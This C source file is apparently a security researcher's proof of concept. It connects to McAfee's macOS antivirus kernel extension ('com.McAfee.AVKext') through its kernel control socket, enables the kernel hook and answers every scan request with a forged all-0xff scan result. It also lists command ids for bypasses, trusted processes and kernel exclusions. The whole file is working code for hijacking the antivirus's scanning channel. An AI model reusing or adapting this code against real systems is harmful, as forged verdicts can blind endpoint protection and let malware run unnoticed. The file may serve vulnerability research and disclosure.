- //
- // main.c
- // AVControl
- //
- // Created by User1 on 10/15/18.
- // Copyright © 2018 Scott Knight. All rights reserved.
- //
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/socket.h>
#include <sys/kern_control.h>
#include <sys/ioctl.h>
#include <sys/sys_domain.h>
#include <unistd.h>
#include <pthread.h>
/* Command ids understood by the kernel control. Each one is passed as the
 * `optname` of setsockopt(fd, SYSPROTO_CONTROL, <id>, ...) (see ping() and
 * main()). Only ENABLE_KERNEL_HOOK, PUT_SCAN_RESULT_MSG and PING_KEXT are
 * used in this file; the payload expected by the other ids is not documented
 * here.
 * NOTE(review): these are writable globals used as constants; an enum would
 * rule out accidental modification, but the symbols are kept as-is. */
int ENABLE_KERNEL_HOOK = 1;
int DISABLE_KERNEL_HOOK = 2;
int PUT_SCAN_RESULT_MSG = 4;
int PUT_SCAN_TIME_OUT = 5;
int PING_KEXT = 6;
int GENERATE_BYPASS = 7;
int SCAN_RW_POLICY = 8;
int ADD_TRUSTED_PROCESS = 13;
int FLUSH_TRUSTED_PROCESS = 14;
int INVALIDATE_BOOSTER_CACHE = 15;
int ENABLE_BOOSTER_CACHE = 16;
int SET_LOG_LEVEL = 17;
int CLEAR_DEVICE_ENTRIES = 18;
int SET_KERNEL_EXCLUSIONS = 19;
int CLEAR_KERNEL_EXCLUSIONS = 20;
/* Name of the kernel control this client attaches to; resolved to an id with
 * CTLIOCGINFO in main(). */
#define MYCONTROLNAME "com.McAfee.AVKext"
/* The connected PF_SYSTEM control socket. Assigned in main() and read by the
 * ping() thread, so it is shared between two threads. */
int fd;
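/*
 * Keep-alive thread body: issues PING_KEXT on the global control socket `fd`
 * every PING_INTERVAL_SEC seconds, forever.
 *
 * @param data  Thread argument; unused.
 * @return      Never returns normally; the process ends when main() returns.
 *              A failed setsockopt() is reported on stderr together with the
 *              errno reason, which the bare return value (-1) does not carry.
 */
void* ping(void* data)
{
    enum { PING_INTERVAL_SEC = 50 };

    (void)data;
    for (;;) {
        int result = setsockopt(fd, SYSPROTO_CONTROL, PING_KEXT, NULL, 0);
        if (result) {
            int err = errno; /* saved before fprintf() can clobber it */
            fprintf(stderr, "setsockopt failed on PING_KEXT call - result was %d (%s)\n",
                    result, strerror(err));
        }
        sleep(PING_INTERVAL_SEC);
    }
    return NULL; /* not reached; satisfies the pthread start-routine signature */
}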
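/* Hex-dump layout: bytes per printed row and the default dump length. */
enum { HEX_DUMP_ROW = 16, HEX_DUMP_DEFAULT_LEN = 128 };

/*
 * Formats `len` bytes at `mem` as lowercase hex pairs, with a newline after
 * every HEX_DUMP_ROW bytes, into `out`.
 *
 * @param mem  Bytes to format (may be NULL only when len == 0).
 * @param len  Number of bytes to format.
 * @param out  Destination; always NUL-terminated when cap > 0.
 * @param cap  Capacity of `out`; 0 means "measure only" and nothing is written.
 * @return     The number of characters the full dump needs, excluding the NUL
 *             (snprintf-style), so a caller can detect truncation.
 */
static size_t format_hex_memory(const void *mem, size_t len, char *out, size_t cap)
{
    static const char digits[] = "0123456789abcdef";
    const unsigned char *p = mem;
    size_t need = 0;

    for (size_t i = 0; i < len; i++) {
        char piece[3];
        size_t k = 0;
        piece[k++] = digits[p[i] >> 4];
        piece[k++] = digits[p[i] & 0x0f];
        /* Newline after the last byte of a full row (the original broke the
         * row after its first byte, giving a 17-byte first line). */
        if (i % HEX_DUMP_ROW == HEX_DUMP_ROW - 1) {
            piece[k++] = '\n';
        }
        for (size_t j = 0; j < k; j++, need++) {
            if (need + 1 < cap) {
                out[need] = piece[j];
            }
        }
    }
    if (cap > 0) {
        out[need < cap ? need : cap - 1] = '\0';
    }
    return need;
}

/*
 * Prints `len` bytes at `mem` as a hex dump on stdout, one row of
 * HEX_DUMP_ROW bytes per line, followed by four blank lines.
 */
static void print_hex_memory_n(const void *mem, size_t len)
{
    const unsigned char *p = mem;

    for (size_t off = 0; off < len; off += HEX_DUMP_ROW) {
        size_t chunk = len - off < HEX_DUMP_ROW ? len - off : HEX_DUMP_ROW;
        char line[HEX_DUMP_ROW * 2 + 2]; /* hex pairs + newline + NUL */
        format_hex_memory(p + off, chunk, line, sizeof line);
        fputs(line, stdout);
    }
    fputs("\n\n\n\n", stdout);
}

/*
 * Debug helper: hex-dumps the first HEX_DUMP_DEFAULT_LEN bytes at `mem`.
 * The caller must guarantee that many bytes are readable at `mem`.
 */
void print_hex_memory(void *mem) {
    print_hex_memory_n(mem, HEX_DUMP_DEFAULT_LEN);
}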
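/* Sizes used by the receive loop. */
enum {
    /* Receive buffer for kext datagrams. The original used an automatic array
     * of this size; it is heap-allocated here to keep ~1 MiB off the stack. */
    RECV_BUFFER_SIZE = 1080000,
    /* Byte offset at which the datagram is printed as a string.
     * NOTE(review): taken from the original code; confirm against the kext's
     * message layout. */
    MSG_PATH_OFFSET = 48,
    /* Length of the all-0xff reply sent with PUT_SCAN_RESULT_MSG. */
    SCAN_RESULT_LEN = 1088
};

/*
 * Creates a PF_SYSTEM control socket and connects it to the kernel control
 * named MYCONTROLNAME.
 *
 * @return The connected descriptor, or -1 after writing a diagnostic to
 *         stderr. The descriptor is closed on every failure path.
 */
static int open_kext_control(void)
{
    int sock = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
    if (sock == -1) {
        perror("failed to open socket");
        return -1;
    }

    /* Translate the control name into the id the kernel assigned to it. */
    struct ctl_info info;
    memset(&info, 0, sizeof info);
    int n = snprintf(info.ctl_name, sizeof info.ctl_name, "%s", MYCONTROLNAME);
    if (n < 0 || (size_t)n >= sizeof info.ctl_name) {
        fprintf(stderr, "control name %s does not fit in ctl_name\n", MYCONTROLNAME);
        close(sock);
        return -1;
    }
    if (ioctl(sock, CTLIOCGINFO, &info)) {
        /* perror() appends ": <reason>\n" itself, so the text has no newline. */
        perror("Could not get ID for kernel control");
        close(sock);
        return -1;
    }

    struct sockaddr_ctl addr;
    memset(&addr, 0, sizeof addr); /* also zeroes sc_unit */
    addr.sc_len = sizeof addr;
    addr.sc_family = AF_SYSTEM;
    addr.ss_sysaddr = AF_SYS_CONTROL;
    addr.sc_id = info.ctl_id;
    addr.sc_unit = 0;

    int result = connect(sock, (struct sockaddr *)&addr, sizeof addr);
    if (result) {
        int err = errno; /* saved before fprintf() can clobber it */
        fprintf(stderr, "connect failed %d (%s)\n", result, strerror(err));
        close(sock);
        return -1;
    }
    return sock;
}

/*
 * Handles one datagram received from the kext: prints the string found at
 * MSG_PATH_OFFSET, bounded by the datagram length, and answers on the global
 * socket `fd` with a SCAN_RESULT_LEN-byte reply of 0xff bytes.
 *
 * @param msg  Start of the received datagram.
 * @param len  Number of bytes actually received into `msg`.
 */
static void handle_kext_message(const char *msg, size_t len)
{
    if (len > MSG_PATH_OFFSET) {
        /* The datagram is not NUL-terminated by the receiver, so "%.*s" stops
         * at the end of the received bytes even if no terminator is present. */
        printf("%.*s\n", (int)(len - MSG_PATH_OFFSET), msg + MSG_PATH_OFFSET);
    } else {
        fprintf(stderr, "short message from kext (%zu bytes)\n", len);
    }
    /* For raw payload inspection: print_hex_memory_n-style dumps can be
     * reintroduced here; the original had print_hex_memory(buffer) commented out. */

    /* NOTE(review): the reply content (all 0xff) is kept from the original; what
     * the kext makes of it is not documented here. */
    unsigned char file_scan_message[SCAN_RESULT_LEN];
    memset(file_scan_message, 0xff, sizeof file_scan_message);
    int result = setsockopt(fd, SYSPROTO_CONTROL, PUT_SCAN_RESULT_MSG,
                            file_scan_message, sizeof file_scan_message);
    if (result) {
        int err = errno;
        fprintf(stderr, "setsockopt failed on PUT_SCAN_RESULT_MSG call - result was %d (%s)\n",
                result, strerror(err));
    }
}

/*
 * Connects to the kernel control, starts the keep-alive thread, enables the
 * kernel hook and then answers every datagram the kext sends until the
 * socket reports an error or end of stream.
 *
 * @return EXIT_SUCCESS once the receive loop ends, EXIT_FAILURE when the
 *         socket, the buffer or the keep-alive thread could not be set up.
 */
int main(int argc, const char * argv[]) {
    (void)argc;
    (void)argv;

    fd = open_kext_control();
    if (fd == -1) {
        return EXIT_FAILURE;
    }

    int rc = EXIT_SUCCESS;
    char *buffer = malloc(RECV_BUFFER_SIZE);
    if (buffer == NULL) {
        perror("malloc");
        rc = EXIT_FAILURE;
        goto out_close;
    }

    /* ping() ignores its argument, so no pointer to a local is handed over. */
    pthread_t p_thread1;
    int perr = pthread_create(&p_thread1, NULL, ping, NULL);
    if (perr != 0) {
        fprintf(stderr, "pthread_create failed: %s\n", strerror(perr));
        rc = EXIT_FAILURE;
        goto out_free;
    }

    int result = setsockopt(fd, SYSPROTO_CONTROL, ENABLE_KERNEL_HOOK, NULL, 0);
    if (result) {
        int err = errno;
        fprintf(stderr, "setsockopt failed on ENABLE_KERNEL_HOOK call - result was %d (%s)\n",
                result, strerror(err));
    }

    /* The socket is SOCK_DGRAM, so each recv() returns one complete datagram
     * and it is processed from offset 0. The original appended into the buffer
     * and sized recv() by the previous count instead of the remaining space,
     * which could write past the end of the buffer. */
    for (;;) {
        ssize_t count = recv(fd, buffer, RECV_BUFFER_SIZE, 0);
        if (count > 0) {
            handle_kext_message(buffer, (size_t)count);
            continue;
        }
        if (count == -1) {
            perror("recv");
        }
        /* count == 0: end of stream on the socket */
        break;
    }

    /* The keep-alive thread is not joined: it loops forever and is torn down
     * together with the process when main() returns. */
out_free:
    free(buffer);
out_close:
    close(fd);
    fd = -1;
    return rc;
}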